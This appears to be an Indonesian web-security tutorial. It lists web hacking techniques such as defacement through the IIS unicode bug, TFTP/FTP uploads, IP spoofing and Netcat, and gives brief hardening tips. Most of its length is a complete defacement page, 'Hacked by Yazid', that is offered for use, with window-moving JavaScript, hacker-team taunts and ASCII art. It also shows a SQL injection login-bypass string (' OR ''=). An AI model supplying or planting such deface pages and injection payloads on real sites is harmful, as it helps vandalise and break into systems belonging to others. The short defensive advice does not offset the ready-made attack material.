Keamanan Web Server


WEB HACKING

World Wide Web merupakan bagian dari Internet yang paling populer, sehingga serangan paling banyak terjadi lewat port 80 atau yang dikenal sebagai Web hacking, berupa :
1. Deface situs
2. SQL injection
3. Memanfaatkan kelemahan scripting maupun HTML form.

Deface
Deface adalah suatu aktivitas mengubah halaman depan atau isi suatu situs Web sehingga tampilan atau isinya sesuai dengan yang anda kehendaki.
Deface banyak terjadi pada situs e-commerce web yang menggunakan Microsoft IIS. Ini dikarenakan adanya bug pada IIS yang dikenal sebagai unicode bug. Dengan adanya bug ini seseorang dapat mengakses command line shell cmd.exe pada server keluarga Windows NT.

Teknik-teknik Deface Situs Web
Secara garis besarnya deface ini dapat dilakukan dengan 3 cara yaitu :

  1. Secara umum, Memasukkan Input Illegal Tujuan adalah agar user terlempar keluar dari direktori file-file web server dan masuk ke root directory untuk kemudian menjalankan cmd.exe dan mengamati struktur direktori pada NT server sasaran.
  2. Dengan TFTP (Trivial File Transfer Protocol) adalah protokol berbasis UDP yang listen pada port 69 dan sangat rawan keamanannya dan kebanyakan web server menjalankan servis TFTP ini.
  3. Dengan FTP dengan Web yang telah diisi bahan deface. Setiap NT server memiliki file ftp.exe untuk melakukan FTP upload ataupun FTP download (dari dan ke sever itu).

Deface bisa dilakukan dengan berbagai macam cara seperti :

Teknik teknik itu antara lain:

1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks

1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.

IP Spoofing terjadi ketika seorang attacker “mengakali” packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker

2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang

3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efisien untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.

Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar “memberitahu” password dan kode akses terhadap system.

4. Flooding & Broadcasting
Seorang attacker bisa mengurangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/ permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service (DoS), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang Menyediakan informasi menjadi lemah dan akhirnya menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan

5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama (header/ kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memproses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah (fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol

6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function)

7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation)

8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.

Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/ user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing

9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network

10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host Menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).

Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya

11. Remote File System Attack
Protokol-protokol untuk tranportasi data (tulang punggung dari internet) adalah tingkat TCP (TCP Level) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file

12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor

13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like

15. HTTPD AttacksKerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.

Salah satu script untuk deface web :

”."><html><head><title>Hacked by Yazid</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta content="MSHTML 6.00.2900.2180" name="GENERATOR"><script>
window.scrollBy(0, 1)
window.resizeTo(0,0)
window.moveTo(0,0)
//setInterval("move()",30);
setTimeout("move()", 1);
var mxm=50
var mym=25
var mx=0
var my=0
var sv=50
var status=1
var szx=0
var szy=0
var c=255
var n=0
var sm=30
var cycle=2
var done=2

function move(){
 if (status == 1){
     mxm=mxm/1.05
     mym=mym/1.05
     mx=mx+mxm
     my=my-mym
     mxm=mxm+(400-mx)/100
     mym=mym-(300-my)/100
     window.moveTo(mx,my)
     rmxm=Math.round(mxm/10)
     rmym=Math.round(mym/10)
     if (rmxm == 0){
         if (rmym == 0){
             status=2
         }
     }
  }
  if (status == 2){
      sv=sv/1.1
      scrratio=1+1/3
      mx=mx-sv*scrratio/2
      my=my-sv/2
      szx=szx+sv*scrratio
      szy=szy+sv
      window.moveTo(mx,my)
      window.resizeTo(szx,szy)
      if (sv < 0.1){
          status=3
      }
  }
  if (status == 3){
      document.fgColor=0xffffFF
      c=c-16
      if (c<0){status=8}
  }
  if (status == 4){
      c=c+16
      document.bgColor=c*65536
      document.fgColor=(255-c)*65536
      if (c > 239){status=5}
  }
  if (status == 5){
      c=c-16
      document.bgColor=c*65536
      document.fgColor=(255-c)*65536
      if (c < 0){
          status=6
          cycle=cycle-1
          if (cycle > 0){
              if (done == 1)
              {status=7}
              else
              {status=4}
          }
      }
  }
  if (status == 6){
      document.title = "INC Team"
      alert("INC Team")
      cycle=2
      status=4
      done=1
  }
  if (status == 7){
      c=c+4
      document.bgColor=c*65536
      document.fgColor=(255-c)*65536
      if (c > 128){status=8}
  }
  if (status == 8){
      window.moveTo(0,0)
      sx=screen.availWidth
      sy=screen.availHeight
      window.resizeTo(sx,sy)
      status=9
  }
  var timer=setTimeout("move()",0.3)
}
</script>

</b></font></p></td></tr></tbody></table></form></div></body></html>
<HTML>
<HEAD>
<TITLE>Situs anda telah berhasil kami deface. Keamanan situs telah berhasil di terobos </TITLE>
<script language="JavaScript">
msg = new Array(); //strings written in screen
msg[0] = "<h2><u><center>-|-Yazid Hacker Team-|-</center></u></h2>";
msg[1] = "<center>DEFACE YOUR SITE </center>";
msg[2] = "<center>Hi Admin</center>";
msg[3] = "<center>WE HAVE BEEN SUCCESSFUL TO DEFACE YOUR SITE</center>";
msg[4] = "<center>INCREASE THE SECURITY OF YOUR SITE</center>";
msg[5] = "<center>By Yazid Bustomi</center>"

text1 = ""; //the same as text2, only the last character is highlighted
text2 = ""; //current string, which will be written
count = 0; //char index in string text
count2 = 0; //number of strings
text = msg[0].split(""); //text - string written
function writetext() { //show strings above on screen

text1 = text2 + "<font color='00ff00'>" + text[count] + "</font>";
text2 += text[count];
document.all["nothing"].innerHTML = text1; //where to write

if (count < text.length-1){
    count++;
    setTimeout('writetext()', 25);
}

else { //if this string is written, get the new string

count = 0;

if (count2 != 4) { //write 4 strings
    count2++;
    text2 += "<p>"; //a new line
    text = eval('msg['+count2+'].split("")'); //get the new string to text
    setTimeout('writetext()', 25);
}
}
}
</script>

</HEAD>

<FONT style="FONT-SIZE: 4pt" face="Courier New">
<DIV align=center><center><TR><TD valign="middle" align="center"><FONT class=pic2ascii><BR><FONT
color=#000000>##1</FONT><FONT color=#808080>#</FONT><FONT
color=#ffffff>0</FONT><FONT color=#808080>@</FONT><FONT
color=#000000>0#0@101@0@0#@1@@#0#@</FONT><FONT color=#c0c0c0>1</FONT><FONT
color=#000000>1@#1#</FONT><BR><FONT color=#000000>01</FONT><FONT
color=#808080>#</FONT><FONT color=#ffffff>0</FONT><FONT
color=#808080>1</FONT><FONT color=#000000>0111@#1#@@###@#00##01@</FONT><FONT
color=#808080>#</FONT><FONT color=#000000>000@</FONT><BR><FONT
color=#000000>01</FONT><FONT color=#ffffff>@</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>#01@#@</FONT><FONT
color=#808080>0111@10#1@</FONT><FONT color=#000000>@0@010#</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>111#</FONT><BR><FONT
color=#000000>@</FONT><FONT color=#808080>#</FONT><FONT
color=#ffffff>1</FONT><FONT color=#808080>1</FONT><FONT
color=#000000>011@#</FONT><FONT color=#808080>#</FONT><FONT
color=#c0c0c0>0@00@10</FONT><FONT color=#808080>0@#@</FONT><FONT
color=#000000>@11110</FONT><FONT color=#c0c0c0>@</FONT><FONT
color=#000000>@@00</FONT><BR><FONT color=#000000>0</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#ffffff>1</FONT><FONT
color=#808080>@</FONT><FONT color=#000000>##1</FONT><FONT
color=#808080>01</FONT><FONT color=#c0c0c0>1@</FONT><FONT
color=#ffffff>1#1@</FONT><FONT color=#c0c0c0>@0#</FONT><FONT
color=#808080>#@1</FONT><FONT color=#000000>1</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#000000>10##</FONT><FONT
color=#808080>@</FONT><FONT color=#000000>000@</FONT><BR><FONT
color=#000000>1</FONT><FONT color=#c0c0c0>@</FONT><FONT
color=#ffffff>1</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#808080>1</FONT><FONT color=#000000>@</FONT><FONT
color=#808080>1</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#808080>0</FONT><FONT color=#c0c0c0>#</FONT><FONT
color=#ffffff>#@0#1@</FONT><FONT color=#c0c0c0>1#@</FONT><FONT
color=#808080>@</FONT><FONT color=#000000>@</FONT><FONT
color=#c0c0c0>#</FONT><FONT color=#808080>0</FONT><FONT
color=#000000>1@</FONT><FONT color=#c0c0c0>10</FONT><FONT
color=#808080>@</FONT><FONT color=#000000>@100</FONT><BR><FONT
color=#000000>0</FONT><FONT color=#808080>#</FONT><FONT
color=#ffffff>1</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#808080>@#</FONT><FONT color=#000000>@</FONT><FONT
color=#808080>#</FONT><FONT color=#c0c0c0>##</FONT><FONT
color=#ffffff>@#1@1@@</FONT><FONT color=#c0c0c0>@@</FONT><FONT
color=#808080>@</FONT><FONT color=#000000>0</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>#</FONT><FONT
color=#808080>0</FONT><FONT color=#c0c0c0>#@0</FONT><FONT
color=#000000>110@0</FONT><BR><FONT color=#000000>@0</FONT><FONT
color=#c0c0c0>00</FONT><FONT color=#808080>@1</FONT><FONT
color=#000000>@</FONT><FONT color=#808080>0</FONT><FONT
color=#c0c0c0>01</FONT><FONT color=#ffffff>###@1##</FONT><FONT
color=#c0c0c0>@0@</FONT><FONT color=#808080>#</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>#</FONT><FONT
color=#c0c0c0>10@</FONT><FONT color=#808080>0</FONT><FONT
color=#000000>01@11</FONT><BR><FONT color=#000000>1#1</FONT><FONT
color=#808080>1@</FONT><FONT color=#000000>#@</FONT><FONT
color=#808080>1</FONT><FONT color=#c0c0c0>11</FONT><FONT
color=#ffffff>11@0#1#</FONT><FONT color=#c0c0c0>@1@</FONT><FONT
color=#808080>@1</FONT><FONT color=#000000>##</FONT><FONT
color=#c0c0c0>#</FONT><FONT color=#808080>0</FONT><FONT
color=#000000>@#</FONT><FONT color=#c0c0c0>1</FONT><FONT
color=#000000>@00</FONT><BR><FONT color=#000000>#@</FONT><FONT
color=#808080>#</FONT><FONT color=#000000>#11</FONT><FONT
color=#808080>00</FONT><FONT color=#c0c0c0>@#</FONT><FONT
color=#ffffff>1#0##10</FONT><FONT color=#c0c0c0>0#0</FONT><FONT
color=#808080>10</FONT><FONT color=#000000>1@@@0#</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>101</FONT><BR><FONT
color=#000000>#@0</FONT><FONT color=#808080>10#@</FONT><FONT
color=#c0c0c0>@01#</FONT><FONT color=#ffffff>#100@@</FONT><FONT
color=#c0c0c0>##0</FONT><FONT color=#808080>###</FONT><FONT
color=#000000>11#0@#001</FONT><BR><FONT color=#000000>#0</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>#</FONT><FONT
color=#808080>0</FONT><FONT color=#c0c0c0>00#</FONT><FONT
color=#ffffff>1</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#808080>@</FONT><FONT color=#c0c0c0>#</FONT><FONT
color=#ffffff>@0@#</FONT><FONT color=#c0c0c0>00@</FONT><FONT
color=#808080>#0</FONT><FONT color=#000000>##@@#@</FONT><FONT
color=#c0c0c0>#</FONT><FONT color=#000000>@1#0</FONT><BR><FONT
color=#000000>#0</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#000000>#</FONT><FONT color=#808080>1</FONT><FONT
color=#c0c0c0>@#</FONT><FONT color=#ffffff>1@</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#808080>@</FONT><FONT
color=#c0c0c0>@0</FONT><FONT color=#ffffff>##1</FONT><FONT
color=#c0c0c0>@1</FONT><FONT color=#808080>#@</FONT><FONT
color=#c0c0c0>#0#</FONT><FONT color=#808080>0</FONT><FONT
color=#000000>1##00#@@</FONT><BR><FONT color=#000000>#11#</FONT><FONT
color=#808080>0</FONT><FONT color=#c0c0c0>@</FONT><FONT
color=#ffffff>0#1@</FONT><FONT color=#c0c0c0>1</FONT><FONT
color=#808080>1</FONT><FONT color=#c0c0c0>@11#@</FONT><FONT
color=#808080>#0</FONT><FONT color=#c0c0c0>11@1@</FONT><FONT
color=#808080>0</FONT><FONT color=#000000>10#0000</FONT><BR><FONT
color=#000000>1@@#0</FONT><FONT color=#ffffff>#</FONT><FONT
color=#c0c0c0>#</FONT><FONT color=#808080>0@</FONT><FONT
color=#c0c0c0>##011@1#</FONT><FONT color=#808080>#</FONT><FONT
color=#c0c0c0>##0</FONT><FONT color=#808080>@01@0</FONT><FONT
color=#000000>0011#0</FONT><BR><FONT color=#000000>1#</FONT><FONT
color=#808080>@</FONT><FONT color=#000000>##</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#808080>#</FONT><FONT
color=#000000>1#0#</FONT><FONT color=#c0c0c0>#</FONT><FONT
color=#808080>1#</FONT><FONT color=#c0c0c0>@#</FONT><FONT
color=#000000>@</FONT><FONT color=#c0c0c0>0#1</FONT><FONT
color=#808080>0</FONT><FONT color=#000000>@1@@#1#0@@0</FONT><BR><FONT
color=#000000>1#</FONT><FONT color=#808080>00</FONT><FONT
color=#000000>1</FONT><FONT color=#808080>1</FONT><FONT
color=#000000>0</FONT><FONT color=#ff0000>1#0</FONT><FONT
color=#000000>#@</FONT><FONT color=#808080>10</FONT><FONT
color=#000000>@</FONT><FONT color=#808080>@</FONT><FONT
color=#000000>#</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#808080>0</FONT><FONT color=#000000>11</FONT><FONT
color=#ff0000>1##</FONT><FONT color=#000000>0@@#0#@1</FONT><BR><FONT
color=#000000>11</FONT><FONT color=#808080>1</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#808080>00</FONT><FONT
color=#000000>@</FONT><FONT color=#ff0000>0@01</FONT><FONT
color=#000000>0@1@0@</FONT><FONT color=#808080>@</FONT><FONT
color=#000000>10</FONT><FONT color=#ff0000>0111</FONT><FONT
color=#000000>##@0@#0@</FONT><BR><FONT color=#000000>#0</FONT><FONT
color=#808080>1</FONT><FONT color=#ffffff>@</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#808080>0</FONT><FONT
color=#000000>11</FONT><FONT color=#ff0000>11#</FONT><FONT
color=#000000>1##@0@#@1</FONT><FONT color=#ff0000>###</FONT><FONT
color=#000000>@0#</FONT><FONT color=#808080>@</FONT><FONT
color=#000000>00@#@</FONT><BR><FONT color=#000000>@@0</FONT><FONT
color=#c0c0c0>1</FONT><FONT color=#ffffff>#</FONT><FONT
color=#c0c0c0>0@</FONT><FONT color=#000000>1@0@@##1</FONT><FONT
color=#808080>@#</FONT><FONT color=#000000>@@@@1</FONT><FONT
color=#808080>@#00</FONT><FONT color=#000000>@00@01</FONT><BR><FONT
color=#000000>10@</FONT><FONT color=#c0c0c0>##</FONT><FONT
color=#ffffff>1@0@</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#808080>#@</FONT><FONT color=#000000>@#</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#ffffff>#</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#808080>1</FONT><FONT
color=#000000>#0</FONT><FONT color=#808080>1010#</FONT><FONT
color=#000000>0101@0#</FONT><BR><FONT color=#000000>0@01</FONT><FONT
color=#808080>100</FONT><FONT color=#c0c0c0>111</FONT><FONT
color=#808080>@0#@</FONT><FONT color=#ffffff>01</FONT><FONT
color=#808080>@</FONT><FONT color=#c0c0c0>#</FONT><FONT
color=#808080>1</FONT><FONT color=#000000>#10@#0@#0##@@</FONT><BR><FONT
color=#000000>0100#0</FONT><FONT color=#808080>110@@</FONT><FONT
color=#c0c0c0>1</FONT><FONT color=#808080>#</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#ffffff>0</FONT><FONT
color=#808080>#</FONT><FONT color=#000000>@</FONT><FONT
color=#808080>01</FONT><FONT color=#000000>#1@#000@101@0</FONT><BR><FONT
color=#000000>01@1@1#@01</FONT><FONT color=#808080>@</FONT><FONT
color=#c0c0c0>110#</FONT><FONT color=#000000>@11</FONT><FONT
color=#808080>0</FONT><FONT color=#000000>@1@0@#000@#0#</FONT><BR><FONT
color=#000000>##@0##1@@#</FONT><FONT color=#808080>#</FONT><FONT
color=#ffffff>1</FONT><FONT color=#c0c0c0>0@@</FONT><FONT
color=#000000>0@#</FONT><FONT color=#808080>#</FONT><FONT
color=#000000>0110@#001@10#</FONT><BR><FONT color=#000000>#01@00@#@@</FONT><FONT
color=#808080>@</FONT><FONT color=#ffffff>1@#</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>#</FONT><FONT
color=#ffffff>0</FONT><FONT color=#000000>1</FONT><FONT
color=#808080>0</FONT><FONT color=#000000>01@</FONT><FONT
color=#808080>1</FONT><FONT color=#000000>10@01@##0</FONT><BR><FONT
color=#000000>@##11010</FONT><FONT color=#808080>1</FONT><FONT
color=#000000>@</FONT><FONT color=#c0c0c0>0@#</FONT><FONT
color=#ffffff>@#</FONT><FONT color=#c0c0c0>1</FONT><FONT
color=#ffffff>1</FONT><FONT color=#c0c0c0>@0</FONT><FONT
color=#000000>@</FONT><FONT color=#808080>1</FONT><FONT
color=#000000>@</FONT><FONT color=#808080>@</FONT><FONT
color=#000000>#@101#0#1</FONT><BR><FONT color=#000000>11@@#1@@</FONT><FONT
color=#808080>1</FONT><FONT color=#000000>#</FONT><FONT
color=#c0c0c0>#@1</FONT><FONT color=#808080>@</FONT><FONT
color=#c0c0c0>#</FONT><FONT color=#ffffff>@</FONT><FONT
color=#c0c0c0>1</FONT><FONT color=#ffffff>@</FONT><FONT
color=#c0c0c0>@0</FONT><FONT color=#808080>1</FONT><FONT
color=#000000>#1#11111@00</FONT><BR><FONT color=#000000>10#@1001@@</FONT><FONT
color=#c0c0c0>#</FONT><FONT color=#ffffff>1</FONT><FONT
color=#808080>#</FONT><FONT color=#c0c0c0>0#@1</FONT><FONT
color=#ffffff>0</FONT><FONT color=#c0c0c0>#1</FONT><FONT
color=#808080>#</FONT><FONT color=#000000>11@101##011</FONT><BR><FONT
color=#000000>@#@01@0#0#</FONT><FONT color=#808080>1</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#000000>1</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#ffffff>#</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#808080>1</FONT><FONT
color=#ffffff>@</FONT><FONT color=#c0c0c0>#</FONT><FONT
color=#808080>0</FONT><FONT color=#000000>@@@@00100@11</FONT><BR><FONT
color=#000000>@@0#@#1@0#10@</FONT><FONT color=#808080>@</FONT><FONT
color=#c0c0c0>0#</FONT><FONT color=#000000>1</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#808080>0</FONT><FONT
color=#000000>##11111#010@0</FONT><BR><FONT
color=#000000>1@#0#1@010@#011@1@#@0000101@#0@0</FONT></FONT></TD></TR></center></FONT></DIV></FONT><center><SPAN style="FONT-WEIGHT: 200</SPAN></center><FONT style="FONT-SIZE: 1pt"
face="Impact" color="#ff0000">

<BODY text="#00ff00" bgColor="#000000" onload="writetext()">
<table align="center">
<div id="nothing" style="width:'800px'; height:'540px'; font-family:'courier new'; font-weight:'bold'"></div>
</table>

<script language="JavaScript">
if (document.all){
Cols = 9; //number of falldown binary string
Cl = 50; //maximum length of binary string
Cs = 100; //number of pixels between binary strings
Ts = 10; //font-size of binary string
Tc = '#008800'; //color of binary string
Tc1 = '#00ff00'; //color of 1st bit in binary string
MnS = 22; //minimum speed of binary string
MxS = 25; //maximum spees of binary string
I = Cs;
Sp = new Array(); //array speed of binary strings
S = new Array(); //the position of binary string
Y = new Array(); //array of position of binary strings
C = new Array(); //array save bits of string
M = new Array(); //binary string
B = new Array(); //temp for creating binary string
RC = new Array(); //length of binary strings
E = new Array(); //array of head-bit in written strings
Tcc = new Array(0,1,2,3,4,5,6,7,8,9); //array of head-bit in binary strings
document.write("<div id='Container' style='position:absolute; top:0; left+Cs+"'>");
for (i=0; i < Cols; i++){ //area to show binary strings
S[i] = I += Cs; //calculate the position of binary string
document.write("<div id='A' style='position:absolute; top:0; font-family:Arial;" +
"font-size:" + Ts + "px; left:" + S[i] + "; width:" + Ts + "px;" +
"height:0px; color:" + Tc + "; visibility:hidden'></div>");
}

document.write("</div>");
}

for(j = 0; j < Cols; j++){
RC[j] = 1 + Math.round(Math.random()*Cl); //random length of the binary strings
for(i=0; i < RC[j]; i++){
B[i] = ""; //sign of ending of string
C[i] = Math.round(Math.random())+' '; //get bit in binary strings
B[0] += C[i];
}

M[j] = B[0]; //binary string
Y[j] = 0; //1st position of strings are 0
Sp[j] = Math.round(MnS+Math.random()*MxS); //random speed of binary strings
}

function Cycle(){
Container.style.top = window.document.body.scrollTop;
for (i=0; i < Cols; i++){
var r = Math.floor(Math.random()*Tcc.length); //get a position in table Tcc
E[i] = '<font color='+Tc1+'>'+Tcc[r]+'</font>'; //get the head-bit
Y[i]+=Sp[i]; //the position of current string

if (Y[i] > window.document.body.clientHeight) { //if at the end of window, calculate again
i2 = 1 + Math.round(Math.random()*Cols);
RC[i2] = 1 + Math.round(Math.random()*Cl);
for(i3 = 0; i3 < RC[i2]; i3++){ //get bit in binary strings
B[i3] = "";
C[i3] = Math.round(Math.random())+' ';
B[0] += C[i3];
}
M[i] = B[0];
Y[i] = -Ts*M[i].length/1.5; //hide 2/3 string at beginning
Sp[i] = Math.round(MnS+Math.random()*MxS); //random speed of binary strings
A[i].style.visibility = 'visible';
}

A[i].style.top=Y[i]; //the i-th in tag div A

A[i].innerHTML=M[i] + ' ' + E[i]; //show the binary string in tag A

}

setTimeout('Cycle()',100)

}

Cycle();
</script>
<br/>
<h2><u><center>-?| Hacker Ndeso |?-</center></u></h2>
<font color="red">
<center><b> Yazid Hacker Team </b></center>
<center><b>+| http://www.facebook.com/YazidCahRMBIMtsnAe |+</b></center>
<center><b>!! INCREASE THE SECURITY OF YOUR SITE  !!</b></center>
</font>
<P></P></BODY>
</BODY>
</HTML>

NETCAT
Netcat memungkinkan anda membentuk port filter sendiri yang memungkinkan file transfer tanpa menggunakan
FTP. Lebih jauh lagi, Netcat dapat digunakan untuk menghindari port filter pada kebanyakan firewall, menspoof IP address, sampai melakukan spoof session hijacking.

Mengamankan server IIS dari deface
• Selalu mengupdate dengan service pack dan hotfix terbaru.
• Melindungi dengan oleh firewall dan IDS (intrusion detection system).
• Menghilangkan Opsi Tulis pada Protokol HTTP (HTTP 1.0 atau HTTP 1.1)
Perintah-perintah yang didukung HTTP 1.0 dan HTTP 1.1 CONNECT*, DELETE*, GET, HEAD, OPTIONS, POST,PUT,TRACE

SQL Injection

  • SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking untuk menggapai akses pada sistem database berbasis Microsoft SQL Server.
  • Teknik ini memanfaatkan kelemahan dalam bahasa pemograman scripting pada SQL dalam mengolah suatu sistem database yang memungkinkan seseorang tanpa account dapat masuk dan lolos verifikasi dari MS SQL server.

Contoh : Memasukkan karakter ‘ OR ‘ ‘= pada username dan password pada suatu situs.
Untuk mengatasi hal ini, atur agar:
• Hanya karakter tertentu yang boleh diinput.
• Jika terdeteksi adanya illegal character, langsung tolak permintaan.

JavaScript: Client Side Scripting
• JavaScript sendiri merupakan suatu scripting language yang dieksekusi di sisi client (komputer pengguna), sehingga suatu transaksi yang menggunakan JavaScript sebagai scripting language-nya dapat dipastikan sangat rawan terhadap manipulasi dari sisi pemakai.
